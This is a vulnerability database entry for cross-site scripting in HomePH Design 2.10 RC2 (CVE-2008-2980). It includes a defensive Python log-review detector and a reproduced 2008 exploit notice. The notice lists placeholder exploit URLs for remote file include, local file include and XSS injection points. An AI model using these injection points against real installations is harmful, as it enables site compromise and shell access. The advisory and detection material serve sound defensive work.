homeph_design cross-site scripting vulnerability

Vulnerability ID: 1115513    Vulnerability type: Cross-site scripting
Published: 2008-06-22    Updated: 2008-07-02
CVE ID: CVE-2008-2980    CNNVD-ID: CNNVD-200807-037
Platform: PHP    CVSS score: 4.3
|Vulnerability source
https://www.exploit-db.com/exploits/5903
https://www.securityfocus.com/bid/81011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-037
|Vulnerability details
HomePH Design is an open-source, PHP-based CMS. HomePH Design 2.10 RC2 contains multiple cross-site scripting vulnerabilities that allow remote attackers to inject arbitrary web script or HTML via (1) the error_meldung parameter to admin/features/register/register.php, (2) the feature_language[ueberschrift] parameter to admin/features/memberlist/memberlist.php, (3) the language_array[ueberschrift] parameter to admin/features/lostpassword/lostpassword.php, (4) the language_feature[titel] parameter to admin/features/kalender/eingabe.php, and (5) the language_feature[bildmenu] parameter to admin/features/fotogalerie/eingabe.php.
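A log-review check for the five script and parameter pairs listed above, as an added example (not part of the original advisory or of the HomePH Design code base): it flags requests to those scripts whose parameter value decodes to HTML markup characters. The Apache-style log format, the `/cms` install prefix and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path suffix -> query parameter named in the vulnerability details above.
WATCHED = {
    "/admin/features/register/register.php": "error_meldung",
    "/admin/features/memberlist/memberlist.php": "feature_language[ueberschrift]",
    "/admin/features/lostpassword/lostpassword.php": "language_array[ueberschrift]",
    "/admin/features/kalender/eingabe.php": "language_feature[titel]",
    "/admin/features/fotogalerie/eingabe.php": "language_feature[bildmenu]",
}
# Assumed Apache common/combined log layout: client first, quoted request line later.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
MARKUP = re.compile(r'[<>"\']')  # characters that need HTML escaping on output

# Constructed sample lines (documentation addresses, harmless markup).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Jun/2008:10:00:01 +0000] "GET /cms/admin/features/register/register.php?error_meldung=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Jun/2008:10:00:05 +0000] "GET /cms/admin/features/memberlist/memberlist.php?feature_language%5Bueberschrift%5D=%3Ci%3Ex%3C/i%3E HTTP/1.1" 200 734',
    '192.0.2.12 - - [22/Jun/2008:10:00:09 +0000] "GET /cms/admin/features/register/register.php?error_meldung=Passwort+falsch HTTP/1.1" 200 498',
    '192.0.2.13 - - [22/Jun/2008:10:00:12 +0000] "GET /cms/index.php?page=home HTTP/1.1" 200 2048',
]

def suspicious_requests(lines):
    """Return (client, path, parameter, decoded value) for each flagged request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target, _status = m.groups()
        url = urlsplit(target)
        for suffix, param in WATCHED.items():
            if not url.path.lower().endswith(suffix):
                continue
            # parse_qsl percent-decodes names and values, so %5B/%5D brackets
            # and encoded markup are compared in their decoded form.
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name == param and MARKUP.search(value):
                    hits.append((client, url.path, name, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```
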
|Exploit (EXP)
C r a C k E r
T H E   C R A C K   O F   E T E R N A L   M I G H T

From The Ashes and Dust Rises An Unimaginable crack....

[ Remote File Include ]   [ Local File Include ]   [XSS]

Author   : CraCkEr
Group    : uNiTeD CraCkiNg ForCE
Script   : HomePH Design 2.10 RC2
Download : SourceForge.net
Method   : GET
Critical : High
Impact   : System access
Register Globals : [x] ON   [ ] OFF

DALnet #crackers

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.

Exploit URLs


[RFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]

[LFI]

http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]

[XSS]

http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]

Notes: More files are infected.

Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

© CraCkEr 2008

# milw0rm.com [2008-06-22]
|Affected products
HomePH Design HomePH Design 2.10 RC2
|References

Source: XF
Name: homephdesign-multiple-scripts-xss(43260)
Link: http://xforce.iss.net/xforce/xfdb/43260
Source: MILW0RM
Name: 5903
Link: http://www.milw0rm.com/exploits/5903